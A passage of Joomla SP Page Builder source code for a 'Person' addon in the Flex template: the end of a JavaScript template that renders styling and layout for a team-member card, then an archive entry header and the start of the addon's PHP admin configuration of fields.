				let gradient_color2 = (!_.isEmpty(data.content_overlay_gradient) && data.content_overlay_gradient.color2) ? data.content_overlay_gradient.color2 : "rgba(225, 0, 255, 0.7)";
				let gradient_degree = (!_.isEmpty(data.content_overlay_gradient) && data.content_overlay_gradient.deg) ? data.content_overlay_gradient.deg : "";
				let gradient_type = (!_.isEmpty(data.content_overlay_gradient) && data.content_overlay_gradient.type) ? data.content_overlay_gradient.type : "linear";
				let gradient_radialPos = (!_.isEmpty(data.content_overlay_gradient) && data.content_overlay_gradient.radialPos) ? data.content_overlay_gradient.radialPos : "Center Center";
				let gradient_radial_angle1 = (!_.isEmpty(data.content_overlay_gradient) && data.content_overlay_gradient.pos) ? data.content_overlay_gradient.pos : "0";
				let gradient_radial_angle2 = (!_.isEmpty(data.content_overlay_gradient) && data.content_overlay_gradient.pos2) ? data.content_overlay_gradient.pos2 : "100";

				if(data.content_overlay_type !== "none") {
					if(data.content_overlay_color && data.content_overlay_type !== "gradient"){
				#>
						#sppb-addon-{{ data.id }} .person-content-show-on-hover {
							background:{{data.content_overlay_color}};
						}
					<# }
					if(data.content_overlay_gradient && data.content_overlay_type !== "color"){
					#>
						#sppb-addon-{{ data.id }} .person-content-show-on-hover {
							<# if(gradient_type !== "radial"){ #>
								background: -webkit-linear-gradient({{gradient_degree}}deg, {{gradient_color1}} {{gradient_radial_angle1}}%, {{gradient_color2}} {{gradient_radial_angle2}}%) transparent;
								background: linear-gradient({{gradient_degree}}deg, {{gradient_color1}} {{gradient_radial_angle1}}%, {{gradient_color2}} {{gradient_radial_angle2}}%) transparent;
							<# } else { #>
								background: -webkit-radial-gradient(at {{hover_radialPos}}, {{gradient_color1}} {{gradient_radial_angle1}}%, {{gradient_color2}} {{gradient_radial_angle2}}%) transparent;
								background: radial-gradient(at {{hover_radialPos}}, {{gradient_color1}} {{gradient_radial_angle1}}%, {{gradient_color2}} {{gradient_radial_angle2}}%) transparent;
							<# } #>
						}
					<# } #>
				<# } #>
				<# if(data.image_border_radius) { #>
					#sppb-addon-{{ data.id }} .sppb-person-image img {
						border-radius: {{data.image_border_radius}}px;
					}
				<# } #>

				#sppb-addon-{{ data.id }} .sppb-person-name {
					<# if(data.name_color) { #>
						color: {{data.name_color}};
					<# }
					if(data.name_letterspace) {
					#>
						letter-spacing: {{data.name_letterspace}};
					<# }
					if(_.isObject(data.name_fontsize)) {
					#>
						font-size: {{data.name_fontsize.md}}px;
					<# } else { #>
						font-size: {{data.name_fontsize}}px;
					<# }
					if(_.isObject(data.name_lineheight)) {
					#>
						line-height: {{data.name_lineheight.md}}px;
					<# } else { #>
						line-height: {{data.name_lineheight}}px;
					<# }
					if(_.isObject(data.name_font_style)){
						if(data.name_font_style.underline){
					#>
							text-decoration:underline;
						<# }
						if(data.name_font_style.italic){
						#>
							font-style:italic;
						<# }
						if(data.name_font_style.uppercase){
						#>
							text-transform:uppercase;
						<# }
						if(data.name_font_style.weight){
						#>
							font-weight:{{data.name_font_style.weight}};
						<# }
					} #>
				}
				
				#sppb-addon-{{ data.id }} .sppb-person-designation {
					<# if(data.designation_color) { #>
						color: {{data.designation_color}};
					<# } 
					if(data.designation_letterspace) { #>
						letter-spacing: {{data.designation_letterspace}};
					<# } 
					if(_.isObject(data.designation_fontsize)) { #>
						font-size: {{data.designation_fontsize.md}}px;
					<# } else { #>
						font-size: {{data.designation_fontsize}}px;
					<# }
					if(_.isObject(data.designation_lineheight)) { #>
						line-height: {{data.designation_lineheight.md}}px;
					<# } else { #>
						line-height: {{data.designation_lineheight}}px;
					<# }
					if(_.isObject(data.designation_margin)) { #>
						margin: {{data.designation_margin.md}};
					<# } else { #>
						margin: {{data.designation_margin}};
					<# }
					if(_.isObject(data.designation_font_style)) {
						if(data.designation_font_style.underline){ #>
							text-decoration:underline;
						<# }
						if(data.designation_font_style.italic){ #>
							font-style:italic;
						<# }
						if(data.designation_font_style.uppercase){ #>
							text-transform:uppercase;
						<# }
						if(data.designation_font_style.weight){ #>
							font-weight:{{data.designation_font_style.weight}};
						<# }
					} #>
				}
				#sppb-addon-{{ data.id }} .sppb-person-introtext {
					color:{{data.introtext_color}};
					<# if(_.isObject(data.introtext_fontsize)) { #>
						font-size:{{data.introtext_fontsize.md}}px;
					<# } else { #>
						font-size:{{data.introtext_fontsize}}px;
					<# } 
					if(_.isObject(data.introtext_lineheight)){ 
					#>
						line-height:{{data.introtext_lineheight.md}}px;
					<# } else { #>
						line-height:{{data.introtext_lineheight}}px;
					<# } #>
				}
				#sppb-addon-{{ data.id }} .sppb-person-social > li > a {
					color:{{data.social_icon_color}};
					font-size:{{data.social_icon_fontsize}}px;
				}
				#sppb-addon-{{ data.id }} .sppb-person-social > li {
					<# if(_.isObject(data.social_icon_margin)){ #>
						margin:{{data.social_icon_margin.md}};
					<# } else { #>
						margin:{{data.social_icon_margin}};
					<# } #>
				}
				#sppb-addon-{{ data.id }} .sppb-person-social > li > a:hover {
					color:{{data.social_icon_hover_color}};
				}
				
				
				<# if(data.type!="default"){ #>
					#sppb-addon-{{ data.id }} .sppb-addon-person .sppb-addon-content {
						background-color:{{ data.background }};
						padding:0 0 12px;
					}
				<# } #>
				
				
				<# if(data.person_style_preset=="layout1"){ #>
					<# if(data.name_desig_bg || data.name_desig_padding) { #>
						#sppb-addon-{{ data.id }} .person-content-position-bottom-left .sppb-person-information {
							background:{{data.name_desig_bg}};
							padding:{{data.name_desig_padding}};
						}
					<# }
				}
				if(data.person_style_preset=="layout4") {
				#>
					#sppb-addon-{{ data.id }} .sppb-person-addon-content-wrap {
						background: {{data.person_content_bg}};
						<# if(_.isObject(data.person_content_padding)){ #>
							padding: {{data.person_content_padding.md}};
						<# } else { #>
							padding: {{data.person_content_padding}};
						<# } #>
					}
				<# } #>

				@media (min-width: 768px) and (max-width: 991px) {
					#sppb-addon-{{ data.id }} .sppb-person-name {
						<# if(_.isObject(data.name_fontsize)){ #>
							font-size: {{data.name_fontsize.sm}}px;
						<# } #>
						<# if(_.isObject(data.name_lineheight)){ #>
							line-height: {{data.name_lineheight.sm}}px;
						<# } #>
					}
					#sppb-addon-{{ data.id }} .sppb-person-designation {
						<# if(_.isObject(data.designation_fontsize)) { #>
							font-size: {{data.designation_fontsize.sm}}px;
						<# } 
						if(_.isObject(data.designation_lineheight)) {
						#>
							line-height: {{data.designation_lineheight.sm}}px;
						<# }
						if(_.isObject(data.designation_margin)) {
						#>
							margin: {{data.designation_margin.sm}};
						<# } #>
					}
					#sppb-addon-{{ data.id }} .sppb-person-introtext {
						<# if(_.isObject(data.introtext_fontsize)) { #>
							font-size:{{data.introtext_fontsize.sm}}px;
						<# }
						if(_.isObject(data.introtext_lineheight)){ 
						#>
							line-height:{{data.introtext_lineheight.sm}}px;
						<# } #>
					}
					#sppb-addon-{{ data.id }} .sppb-person-social > li {
						<# if(_.isObject(data.social_icon_margin)){ #>
							margin:{{data.social_icon_margin.sm}};
						<# } #>
					}
					<# if(data.person_style_preset=="layout4") { #>
						#sppb-addon-{{ data.id }} .sppb-person-addon-content-wrap {
							<# if(_.isObject(data.person_content_padding)){ #>
								padding: {{data.person_content_padding.sm}};
							<# } #>
						}
					<# } #>
				}
				@media (max-width: 767px) {
					#sppb-addon-{{ data.id }} .sppb-person-name {
						<# if(_.isObject(data.name_fontsize)){ #>
							font-size: {{data.name_fontsize.xs}}px;
						<# } #>
						<# if(_.isObject(data.name_lineheight)){ #>
							line-height: {{data.name_lineheight.xs}}px;
						<# } #>
					}
					#sppb-addon-{{ data.id }} .sppb-person-designation {
						<# if(_.isObject(data.designation_fontsize)) { #>
							font-size: {{data.designation_fontsize.xs}}px;
						<# } 
						if(_.isObject(data.designation_lineheight)) {
						#>
							line-height: {{data.designation_lineheight.xs}}px;
						<# }
						if(_.isObject(data.designation_margin)) {
						#>
							margin: {{data.designation_margin.xs}};
						<# } #>
					}
					#sppb-addon-{{ data.id }} .sppb-person-introtext {
						<# if(_.isObject(data.introtext_fontsize)) { #>
							font-size:{{data.introtext_fontsize.xs}}px;
						<# }
						if(_.isObject(data.introtext_lineheight)){ 
						#>
							line-height:{{data.introtext_lineheight.xs}}px;
						<# } #>
					}
					#sppb-addon-{{ data.id }} .sppb-person-social > li {
						<# if(_.isObject(data.social_icon_margin)){ #>
							margin:{{data.social_icon_margin.xs}};
						<# } #>
					}
					<# if(data.person_style_preset=="layout4") { #>
						#sppb-addon-{{ data.id }} .sppb-person-addon-content-wrap {
							<# if(_.isObject(data.person_content_padding)){ #>
								padding: {{data.person_content_padding.xs}};
							<# } #>
						}
					<# } #>
				}
			</style>
			<#
			let content_position = "";
			if(data.person_style_preset=="layout1"){
				content_position = "person-content-position-bottom-left";
			} else if(data.person_style_preset=="layout2"){
				content_position = "person-content-position-half-overlay";
			} else if(data.person_style_preset=="layout3"){
				content_position = "person-content-position-full-overlay";
			}

			let social_icon_list = "";
			if (!_.isEmpty(data.facebook)) {
				social_icon_list += `<li><a target="_blank" href="${data.facebook}"><i class="fab fa-facebook-f"></i></a></li>`;
			}
			if (!_.isEmpty(data.twitter)) {
				social_icon_list += `<li><a target="_blank" href="${data.twitter}"><i class="fab fa-twitter"></i></a></li>`;
			}
			if (!_.isEmpty(data.youtube)) {
				social_icon_list += `<li><a target="_blank" href="${data.youtube}"><i class="fab fa-youtube"></i></a></li>`;
			}
			if (!_.isEmpty(data.linkedin)) {
				social_icon_list += `<li><a target="_blank" href="${data.linkedin}"><i class="fab fa-linkedin-in"></i></a></li>`;
			}
			if (!_.isEmpty(data.pinterest)) {
				social_icon_list += `<li><a target="_blank" href="${data.pinterest}"><i class="fab fa-pinterest"></i></a></li>`;
			}
			if (!_.isEmpty(data.flickr)) {
				social_icon_list += `<li><a target="_blank" href="${data.flickr}"><i class="fab fa-flickr"></i></a></li>`;
			}
			if (!_.isEmpty(data.dribbble)) {
				social_icon_list += `<li><a target="_blank" href="${data.dribbble}"><i class="fab fa-dribbble"></i></a></li>`;
			}
			if (!_.isEmpty(data.behance)) {
				social_icon_list += `<li><a target="_blank" href="${data.behance}"><i class="fab fa-behance"></i></a></li>`;
			}
			if (!_.isEmpty(data.instagram)) {
				social_icon_list += `<li><a target="_blank" href="${data.instagram}"><i class="fab fa-instagram"></i></a></li>`;
			}
			#>
			<div class="sppb-addon sppb-addon-person {{ data.alignment }} {{ data.class}} {{content_position}}">
				<div class="sppb-addon-content">
				<# if(data.person_style_preset=="layout4"){ #>
					<div class="sppb-row sppb-no-gutter">
						<div class="sppb-col-sm-5">
				<# }
				var personImg = {}
				if (typeof data.image !== "undefined" && typeof data.image.src !== "undefined") {
					personImg = data.image
				} else {
					personImg = {src: data.image}
				}
				if(!_.isEmpty(personImg.src)) {
				#>
					<div class="sppb-person-image <# if(data.person_style_preset=="layout4"){ #> person-layout-4 <# } #>">
						<# if(personImg.src.indexOf("https://") == -1 && personImg.src.indexOf("http://") == -1){ #>
							<img class="sppb-img-responsive" src=\'{{ pagebuilder_base + personImg.src }}\' alt="{{ data.name }}">
						<# } else { #>
							<img class="sppb-img-responsive" src=\'{{ personImg.src }}\' alt="{{ data.name }}">
						<# } #>

						<# if(data.person_style_preset!=="") {
							if(data.person_style_preset!=="layout4"){
						#>
							<div class="person-content-show-on-hover">
							<div class="person-content-hover-content-wrap">
							<# if(data.person_style_preset=="layout1") { #>
								<# if(data.social_position == "after") { #>
									<# if(!_.isEmpty(data.introtext)) { #>
										<div class="sppb-person-introtext sp-inline-editable-element" data-id={{data.id}} data-fieldName="introtext" contenteditable="true">{{ data.introtext }}</div>
									<# } #>
								<# } #>
			
								<# if ( data.facebook || data.twitter || data.youtube || data.linkedin || data.pinterest || data.flickr || data.dribbble || data.behance || data.instagram ) { #>
									<div class="sppb-person-social-icons">
										<ul class="sppb-person-social">
											{{{social_icon_list}}}
										</ul>
									</div>
								<# } #>
			
								<# if(data.social_position == "before") { #>
									<# if(!_.isEmpty(data.introtext)) { #>
										<div class="sppb-person-introtext">{{{ data.introtext }}}</div>
									<# } #>
								<# } #>
							<# } #>

							<# if(data.person_style_preset=="layout2" || data.person_style_preset=="layout3"){ #>
								<# if(data.name || data.designation){ #>
									<# if(!_.isEmpty(data.name)) { #>
										<span class="sppb-person-name sp-inline-editable-element" data-id={{data.id}} data-fieldName="name" contenteditable="true">{{ data.name}}</span>
									<# } #>
									<# if(!_.isEmpty(data.designation)) { #>
										<span class="sppb-person-designation sp-inline-editable-element" data-id={{data.id}} data-fieldName="designation" contenteditable="true">{{ data.designation}}</span>
									<# } #>
									<# if ( data.facebook || data.twitter || data.youtube || data.linkedin || data.pinterest || data.flickr || data.dribbble || data.behance || data.instagram ) { #>
										<div class="sppb-person-social-icons">
											<ul class="sppb-person-social">
												{{{social_icon_list}}}
											</ul>
										</div>
									<# } #>
								<# } #>
							<# } #>
							
							</div>
							</div>
							<# }
						} #>
					</div>
				<# }
				if(data.person_style_preset=="layout4"){
				#>
					</div>
					<div class="sppb-col-sm-7">
					<div class="sppb-person-addon-content-wrap">
				<# }
				if(data.person_style_preset!=="layout2" && data.person_style_preset!=="layout3"){
				#>
					<# if(data.name || data.designation || data.email ){ #>
						<div class="sppb-person-information">
							<# if(!_.isEmpty(data.name)) { #>
								<span class="sppb-person-name sp-inline-editable-element" data-id={{data.id}} data-fieldName="name" contenteditable="true">{{ data.name}}</span>
							<# } #>
							<# if(!_.isEmpty(data.designation)) { #>
								<span class="sppb-person-designation sp-inline-editable-element" data-id={{data.id}} data-fieldName="designation" contenteditable="true">{{ data.designation}}</span>
							<# } #>
							<# if(!_.isEmpty(data.email)) { #>
								<a href="mailto:{{ data.email}}" class="sppb-person-email">{{ data.email}}</a>
							<# } #>
						</div>
					<# } #>
				<# } #>

				<# if(data.person_style_preset!=="layout1" && data.person_style_preset!=="layout2" && data.person_style_preset!=="layout3") { #>
					<# if(data.social_position == "after") { #>
						<# if(!_.isEmpty(data.introtext)) { #>
							<div class="sppb-person-introtext sp-inline-editable-element" data-id={{data.id}} data-fieldName="introtext" contenteditable="true">{{ data.introtext }}</div>
						<# } #>
					<# } #>

					<# if ( data.facebook || data.twitter || data.youtube || data.linkedin || data.pinterest || data.flickr || data.dribbble || data.behance || data.instagram ) { #>
						<div class="sppb-person-social-icons">
						<ul class="sppb-person-social">
							{{{social_icon_list}}}
						</ul>
						</div>
					<# } #>

					<# if(data.social_position == "before") { #>
						<# if(!_.isEmpty(data.introtext)) { #>
							<div class="sppb-person-introtext">{{{ data.introtext }}}</div>
						<# } #>
					<# } #>
				<# }
				if(data.person_style_preset=="layout4"){
				#>
					</div>
					</div>
				</div>
				<# } #>
				</div>
			</div>
			';

			return $output;
	}

}
PK!d�m	�>�>*flex/sppagebuilder/addons/person/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('Restricted access');

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_person',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_DESC'),
		'category'=>'Content',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),
				
				'type'=>array(
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_TYPE'),
					'desc'=>JText::_(''),
					'values'=>array(
						'default'=>JText::_('Default'),
						'flex'=>JText::_('Flex'),
						'flip'=>JText::_('Flip'),
						),
					'std'=>'default',
				),

				'image'=>array(
					'type'=>'media',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_PHOTO'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_PHOTO_DESC'),
					'format'=>'image',
					'std'=> array(
						'src' => 'https://sppagebuilder.com/addons/person/person1.jpg',
					)
				),

				'image_border_radius'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_IMAGE_BORDER_RADIUS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_IMAGE_BORDER_RADIUS_DESC'),
					'std'=>0,
					'max'=>400
				),
				'predefine_separator' => array(
					'type' => 'separator',
					'title' => JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_PREDEFINE_OPTION'),
					'depends'=>array(
						array('type', '=', 'default'),
					),
				),
				'person_style_preset'=>array(
					'type'=>'thumbnail',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_STYLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_STYLE_DESC'),
					'values'=>array(
						'default'=> str_replace('administrator/', '', JURI::base()) . 'components/com_sppagebuilder/addons/person/assets/images/default.png',
						'layout1'=> str_replace('administrator/', '', JURI::base()) . 'components/com_sppagebuilder/addons/person/assets/images/layout1.png',
						'layout2'=> str_replace('administrator/', '', JURI::base()) . 'components/com_sppagebuilder/addons/person/assets/images/layout2.png',
						'layout3'=> str_replace('administrator/', '', JURI::base()) . 'components/com_sppagebuilder/addons/person/assets/images/layout3.png',
						'layout4'=> str_replace('administrator/', '', JURI::base()) . 'components/com_sppagebuilder/addons/person/assets/images/layout4.png',
					),
					'std'=>'default',
					'depends'=>array(
						array('type', '=', 'default'),
					),
				),

				'content_overlay_type'=>array(
					'type'=>'buttons',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_CONTENT_OVERLAY_TYPE'),
					'std'=>'gradient',
					'values'=>array(
						array(
							'label' => 'None',
							'value' => 'none'
						),
						array(
							'label' => 'Color',
							'value' => 'color'
						),
						array(
							'label' => 'Gradient',
							'value' => 'gradient'
						)
					),
					'depends'=>array(
						array('type', '=', 'default'),
						array('person_style_preset', '!=', 'layout4'),
					),
				),
				'content_overlay_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_OVERLAY'),
					'std'=>'',
					'depends'=>array(
						array('type', '=', 'default'),
						array('person_style_preset', '!=', 'layout4'),
						array('content_overlay_type', '=', 'color'),
					),
				),
				'content_overlay_gradient'=>array(
					'type'=>'gradient',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_CONTENT_OVERLAY_GRADIENT'),
					'std'=> array(
						"color" => "rgba(127, 0, 255, 0.8)",
						"color2" => "rgba(225, 0, 255, 0.7)",
						"deg" => "45",
						"type" => "linear"
					),
					'depends'=>array(
						array('type', '=', 'default'),
						array('person_style_preset', '!=', 'layout4'),
						array('content_overlay_type', '=', 'gradient'),
					)
				),
				'name_desig_bg'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_NAME_DESING_BG'),
					'std'=> '#fff',
					'depends'=>array(
						array('person_style_preset', '=', 'layout1'),
					)
				),
				'name_desig_padding'=>array(
					'type'=>'padding',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_NAME_DESING_PADDING'),
					'std'=> '15px 0px 15px 15px',
					'depends'=>array(
						array('person_style_preset', '=', 'layout1'),
					)
				),
				'person_content_bg'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_BG'),
					'std'=> '#fff',
					'depends'=>array(
						array('person_style_preset', '=', 'layout4'),
					)
				),
				'person_content_padding'=>array(
					'type'=>'padding',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_PADDING'),
					'depends'=>array(
						array('person_style_preset', '=', 'layout4'),
					),
					'responsive'=>true,
					'std'=> '15px 15px 15px 15px',
				),
				'name_separator' => array(
					'type' => 'separator',
					'title' => JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_NAME_OPTION'),
				),
				'name'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_NAME'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_NAME_DESC'),
					'placeholder'=>'John Doe',
					'std'=>'Ahin Xian',
				),
				'name_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_NAME_COLOR'),
					'depends'=>array(array('name', '!=', '')),
				),
				'name_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_NAME_FONTSIZE'),
					'depends'=>array(array('name', '!=', '')),
					'max'=> 400,
					'responsive'=>true,
					'std'=> ''
				),
				'name_lineheight'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_NAME_LINEHEIGHT'),
					'depends'=>array(array('name', '!=', '')),
					'max'=> 400,
					'responsive'=>true,
					'std'=> ''
				),
				'name_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_NAME_LATTERSPACING'),
					'depends'=>array(array('name', '!=', '')),
					'values'=>array(
						'-10px'=> '-10px',
						'-9px'=>  '-9px',
						'-8px'=>  '-8px',
						'-7px'=>  '-7px',
						'-6px'=>  '-6px',
						'-5px'=>  '-5px',
						'-4px'=>  '-4px',
						'-3px'=>  '-3px',
						'-2px'=>  '-2px',
						'-1px'=>  '-1px',
						'0px'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0px'
				),
				'name_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_NAME_FONT_FAMILY'),
					'depends'=>array(array('name', '!=', '')),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-person-name { font-family: "{{ VALUE }}"; }'
					)
				),
				'name_font_style'=>array(
					'type'=>'fontstyle',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_NAME_FONT_STYLE'),
					'depends'=>array(array('name', '!=', '')),
				),
				//Designation
				'designation_separator' => array(
					'type' => 'separator',
					'title' => JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_DESIGNATION_OPTION'),
				),
				'designation'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_DESIGNATION'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_DESIGNATION_DESC'),
					'placeholder'=>'Creative Director',
					'std'=>'Creative Director',
				),
				'designation_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_DESIGNATION_COLOR'),
					'depends'=>array(array('designation', '!=', '')),
				),
				'designation_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_DESIGNATION_FONTSIZE'),
					'depends'=>array(array('designation', '!=', '')),
					'max'=> 400,
					'responsive'=>true,
					'std'=> ''
				),
				'designation_lineheight'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_DESIGNATION_LINEHEIGHT'),
					'depends'=>array(array('designation', '!=', '')),
					'max'=> 400,
					'responsive'=>true,
					'std'=> ''
				),
				'designation_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_DESIGNATION_LATTERSPACING'),
					'depends'=>array(array('designation', '!=', '')),
					'values'=>array(
						'-10px'=> '-10px',
						'-9px'=>  '-9px',
						'-8px'=>  '-8px',
						'-7px'=>  '-7px',
						'-6px'=>  '-6px',
						'-5px'=>  '-5px',
						'-4px'=>  '-4px',
						'-3px'=>  '-3px',
						'-2px'=>  '-2px',
						'-1px'=>  '-1px',
						'0px'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0px'
				),
				'designation_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_DESIGNATION_FONT_FAMILY'),
					'depends'=>array(array('designation', '!=', '')),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-person-designation { font-family: "{{ VALUE }}"; }'
					)
				),
				'designation_font_style'=>array(
					'type'=>'fontstyle',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_DESIGNATION_FONT_STYLE'),
					'depends'=>array(array('designation', '!=', '')),
				),
				'designation_margin'=>array(
					'type'=>'margin',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_DESIGNATION_MARGIN'),
					'depends'=>array(array('designation', '!=', '')),
					'responsive'=>true,
					'std'=>''
				),
				'intro_separator' => array(
					'type' => 'separator',
					'title' => JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_EMAIL_INTRO_OPTION'),
				),
				'email'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_EMAIL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_EMAIL_DESC'),
					'placeholder'=>'name@domain.com',
					'std'=>'',
				),

				'introtext'=>array(
					'type'=>'textarea',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_INTROTEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_INTROTEXT_DESC'),
					'depends'=>array(
						array('person_style_preset', '!=', 'layout3'),
					),
					'std'=>'',
				),
				'introtext_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_INTROTEXT_COLOR'),
					'std'=>'',
					'depends'=>array(array('introtext', '!=', '')),
				),
				'introtext_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_INTROTEXT_FONT_SIZE'),
					'depends'=>array(array('introtext', '!=', '')),
					'max'=> 200,
					'responsive'=>true,
					'std'=> ''
				),
				'introtext_lineheight'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_INTROTEXT_LINEHEIGHT'),
					'depends'=>array(array('introtext', '!=', '')),
					'max'=> 200,
					'responsive'=>true,
					'std'=> ''
				),
				'introtext_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_INTROTEXT_FONT_FAMILY'),
					'depends'=>array(array('introtext', '!=', '')),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-person-introtext { font-family: "{{ VALUE }}"; }'
					)
				),
				'social_separator' => array(
					'type' => 'separator',
					'title' => JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_SOCIAL_OPTION'),
				),
				'facebook'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_FACEBOOK'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_FACEBOOK_DESC'),
					'placeholder'=>'http://www.facebook.com/joomshaper',
					'std'=>'http://www.facebook.com/joomshaper',
				),

				'twitter'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_TWITTER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_TWITTER_DESC'),
					'placeholder'=>'http://twitter.com/joomshaper',
					'std'=>'http://twitter.com/joomshaper',
				),

				'youtube'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_YOUTUBE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_YOUTUBE_DESC'),
				),

				'linkedin'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_LINKEDIN'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_LINKEDIN_DESC'),
				),

				'pinterest'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_PINTEREST'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_PINTEREST_DESC'),
				),

				'flickr'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_FLICKR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_FLICKR_DESC'),
				),

				'dribbble'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_DRIBBBLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_DRIBBBLE_DESC'),
				),

				'behance'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_BEHANCE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_BEHANCE_DESC'),
				),

				'instagram'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_INSTAGRAM'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_INSTAGRAM_DESC'),
				),
